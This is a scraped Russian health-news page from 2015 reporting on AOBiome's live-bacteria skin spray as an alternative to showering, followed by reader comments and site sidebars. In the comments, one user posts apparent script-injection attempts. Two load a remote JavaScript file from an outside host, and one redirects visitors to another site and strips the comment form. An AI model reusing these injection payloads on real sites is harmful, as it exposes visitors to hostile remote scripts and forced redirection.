Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Могут ли микробы заменить...  >>  Могут ли микробы заменить душ?
 
Обратная связь
 

Могут ли микробы заменить душ?

Размер шрифта
29 января 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Массачусетса уверяют, что уже в ближайшем будущем многие люди будут начинать свой день не с душа, а с распыления бактерий по поверхности тела. Да-да, это действительно так! Разработки в этой области уже ведутся.

Могут ли микробы заменить душ?

Компания под названием AOBiome создала новый продукт – «тоник с живыми бактериями». Вместо того, чтобы убивать бактерий на поверхности кожи человека (что делают привычные нам мыла, гели, дезодоранты и многие другие продукты), этот тоник будет пополнять их запасы. Большее количество полезных бактерий поможет вашей коже обрести гармонию, утверждают представители компании. По их уверениям, благодаря этому средству люди получат отличную кожу и волосы, причем без всякой химии. 

Политика компании AOBiome полностью согласуется с новым направлением в науке – осознанием той важной роли, которую играют бактерии в поддержании нашего здоровья и красоты. «Эти бактерии что-то вроде мидихлорианов из «Звездных войн»: когда им плохо, это негативно сказывается на организме человека», – объясняет один из основателей компании. «Нарушение бактериальной флоры кишечника может повлиять на функцию мозга, психическое здоровье и процесс пищеварения». Тоже самое касается и других бактерий, живущих в различных частях нашего тела. 

Защищать эти полезные бактерии – вот основная задача продуктов AOBiome. Их AO+ Refreshing Cosmetic Mist – это косметический спрей, созданный из живых бактерий рода Nitrosomonas, которые живут за счет аммиака на коже человека. «Участники клинических испытаний, которые использовали этот спрей, отметили улучшение общего состояния кожи, ее гладкости и плотности по сравнению с группой плацебо», – значится на сайте компании. 

Хотя вы при желании можете полностью отказаться от душа, это вовсе необязательно (изобретатель AOB Дэвид Уитлок предпочел не принимать душ с момента своего открытия – и нет, от него вовсе не исходит неприятный аромат). AOB сохраняется на коже в 95% случаев, если наносить спрей каждый день и принимать душ.

Считаете эту идею абсурдной? Вы удивитесь, но очень многие с вами не согласятся. И хотя спрей AO+ Refreshing Cosmetic Mist все еще не поступил в магазины, значительное число людей уже подписалось на все обновления сайта и с нетерпением ждут даты начала продаж.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

29 января 2015 в 08:09

Комментарий удален за нарушение Правил общения

2 - his shadow

02 февраля 2015 в 09:38

Цитировать   |   Пожаловаться

Ещё раз прошу дать мне ссылку на ваши Правила Общения.

 

3 - zzzzzz

30 июня 2015 в 18:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:20

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Собрались в отпуск? В этих странах вы обязательно заболеете!   ПРОфессиональный и эффективный уход за полостью рта   Мифы о личной гигиене. Нужно ли так часто мыться?   Как тебе не заболеть  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Какие привычки убивают вашу кожу
Как не покрыться прыщами
Можно ли вылечить грибок без врача?

Тесты

1
Как устроены волосы человека?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.